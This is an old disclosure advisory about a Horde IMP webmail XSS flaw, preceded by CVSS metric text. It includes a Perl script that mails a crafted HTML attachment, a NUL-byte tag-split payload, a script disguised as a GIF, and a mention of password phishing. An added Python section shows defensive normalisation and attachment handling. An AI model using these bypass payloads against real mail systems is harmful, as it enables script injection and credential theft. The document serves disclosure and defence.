Attack Vector: Network (AV)
The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity: Low (AC)
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required: Low (PR)
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope: Unchanged (S)
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality: Low (C)
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity: Low (I)
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability: None (A)
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Hello All,
PRELUDE
What is HORDE?
http://www.horde.org/about/
The Mission
The Horde Project is about creating high quality Open Source applications, based on PHP and the Horde Framework.
The guiding principles of the Horde Project are to create solid standards-based applications using intelligent object oriented design that, wherever possible, are designed to run on a wide range of platforms and backends.
There is great emphasis on making Horde as friendly to non-English speakers as possible. The Horde Framework currently supports many localization features such as Unicode and right-to-left text, and generous users have contributed many translations for the framework and applications.
http://www.horde.org/imp/about/
Currently the Horde Project boasts many applications, some already enterprise-ready and deployed in demanding environments, and some exciting new ones still in development.
http://www.horde.org/imp/4.0/
DESCRIPTION
Horde IMP implements a security strategy based on attempting to
strip HTML tags it considers harmful. Before displaying an attached
file, Horde will try to strip tags like <script>, <link> etc.
I can almost see you growing bored at this point - the
topic is so well-trodden - nevertheless I will continue.
Those who are exploiting this bug now - don't be sorry about
it going public - there are numerous but less apparent security issues
with Horde IMP which will still allow you to achieve the same
effect when this bug is fixed.
The next part is going to be a short one; there is nothing
to explain, the example is self-explanatory and well known:
<s0x00hcript>alert('HORDE')</s0x00hcript>
where 0x00h stands for a single ASCII NUL (0x00) byte.
At this point the marvelous strategy of "stripping" will fail to
strip <script>, as well as the other arbitrary tags which are
otherwise filtered, rendering IMP into some moderate quality
software. (Will work only for IE.)
One can devise various examples playing with Unicode
attachments and strings. Yes, it looks like Horde does not know how to
handle UTF-16 attachments. As far as this direction is exploited, there is
a wide playground for those who are interested, in almost every
line of the Horde products.
POC
#
# MIME::Lite SMTP client by C3PO
#
use strict;
use warnings;
use MIME::Lite;

#----------------------------------------------------
# load_file: slurp a file in binary mode and return its contents
#----------------------------------------------------
sub load_file {
    my ($file) = @_;
    open(my $in, '<', $file) or die("Can't open $file: $!");
    binmode $in;
    local $/;                 # slurp mode: read the whole file at once
    my $body = <$in>;
    close($in);
    return $body;
}

#----------------------------------------------------
# main
#----------------------------------------------------
my $c = load_file('Xploitshorderpassed.htm');   # attachment content
my $m = MIME::Lite->new(
    From     => 'mail (at) domain (dot) zone [email concealed]',
    To       => 'mail (at) domain (dot) zone [email concealed]',
    Subject  => 'Horde',
    Date     => "Tue, 17 Dec 2002 22:00:02 +0300",
    Type     => "text/html",
    Data     => $c,
    Filename => "horde.html",
    Encoding => 'base64',
);
$m->attr('content-type.charset' => 'windows-1251');   # not necessary
$m->send("smtp", "smtp.domain.zone");
passed.htm
may contain arbitrary HTML code and JavaScript, as long as IE is
used to view the attachment.
Just save some page and, using any hex editor (preferably HIEW,
of course), insert
<s0x00hcript>alert('HORDE')</s0x00hcript>
into it.
Attach this file, send it to your mailbox and view it via IMP Webmail using IE.
Yes, your guess is correct, image attachments are also
affected:
test.gif
<script language=javascript>
alert('GIF');
document.location.href='http://i3.microsoft.com/h/en-us/i/one_care_2_10.jpg';
</script>
Attach this gif and try to view it in Horde IMP. Never ever give
direct links to images in your software, especially when the images
are not checked. (IE behavior)
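The two failure modes described above, the NUL-split tag that a byte-level blocklist stripper does not recognise (and its UTF-16 cousin) and the "image" attachment that is really HTML, are shown below in Python from the defender's side. This is an added example, not Horde's code and not part of the advisory: a naive stripper next to one that canonicalises the bytes before filtering, and a magic-number check that decides how an attachment is served. The tag list, the sample attachments and the header policy are all assumptions made for the example.

```python
import re

# Tags the filter considers harmful (an assumed list; the advisory names
# <script> and <link> only).
DANGEROUS_TAGS = ("script", "link", "object", "embed", "iframe", "meta", "style")
_TAG_BYTES = re.compile(
    rb"</?\s*(?:" + b"|".join(t.encode() for t in DANGEROUS_TAGS) + rb")\b[^>]*>",
    re.IGNORECASE,
)
_TAG_TEXT = re.compile(
    r"</?\s*(?:" + "|".join(DANGEROUS_TAGS) + r")\b[^>]*>", re.IGNORECASE
)

# Constructed sample attachments (not the advisory's files): the tag as
# written, the NUL-split form the advisory describes, and a UTF-16 copy.
PLAIN = b"<script>alert('HORDE')</script>"
NUL_SPLIT = b"<s\x00cript>alert('HORDE')</s\x00cript>"
UTF16 = PLAIN.decode("ascii").encode("utf-16")


def naive_strip(data: bytes) -> bytes:
    """Byte-level blocklist stripper of the kind the advisory criticises:
    it only recognises a tag name when its letters are contiguous, so a
    NUL byte inside the name (or a UTF-16 encoding) slips past it."""
    return _TAG_BYTES.sub(b"", data)


def normalize(data: bytes) -> str:
    """Canonicalise before filtering: decode UTF-16 when a byte-order mark
    is present, otherwise treat the data as UTF-8, then drop NUL and other
    control characters that a lenient renderer would simply ignore."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = data.decode("utf-16", errors="replace")
    else:
        text = data.decode("utf-8", errors="replace")
    return "".join(ch for ch in text if ch >= " " or ch in "\t\n\r")


def hardened_strip(data: bytes) -> str:
    """Same blocklist, applied only after normalisation, so the NUL-split
    and UTF-16 variants are seen as the plain tag they decode to."""
    return _TAG_TEXT.sub("", normalize(data))


# Leading bytes of the image formats this check accepts.
IMAGE_MAGIC = {
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}


def looks_like_image(data: bytes, declared_type: str) -> bool:
    """True only when the bytes start with the magic number of the
    declared image type; an HTML file named test.gif fails this."""
    magics = IMAGE_MAGIC.get(declared_type.lower())
    return bool(magics) and data.startswith(magics)


def attachment_headers(filename: str, declared_type: str, data: bytes) -> dict:
    """Response headers for serving an attachment: a verified image keeps
    its type, anything else is forced to application/octet-stream, and the
    browser is told not to sniff and not to render inline."""
    content_type = (
        declared_type if looks_like_image(data, declared_type)
        else "application/octet-stream"
    )
    safe_name = re.sub(r"[^\w.\-]", "_", filename)  # no quotes/CR/LF in the header
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN), ("nul-split", NUL_SPLIT), ("utf-16", UTF16)):
        print(f"{label:9} naive={naive_strip(sample)!r} hardened={hardened_strip(sample)!r}")
    fake_gif = b"<script language=javascript>alert('GIF');</script>"
    print(attachment_headers("test.gif", "image/gif", fake_gif))
```

Run stand-alone, the naive stripper leaves the NUL-split and UTF-16 samples untouched while the hardened one reduces all three to the bare `alert('HORDE')`, and the fake GIF is served as `application/octet-stream` with a download disposition instead of being handed to the browser as an image. Normalising first is the point: whatever the renderer will tolerate and ignore must be removed before the filter looks at the data, otherwise the filter and the browser disagree about what the bytes mean.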
Given this mechanism, an attacker may easily steal a
user's password by devising a DHTML attachment which obfuscates user
input, i.e. impersonating the server, it raises an Apache
authorization window and shows some "Your password has expired" crap.
The example is not provided.
Yet closer inspection of the source code and algorithms may
reveal some other interesting yet questionable strategies, which I
leave for you to mess with.
--
Best regards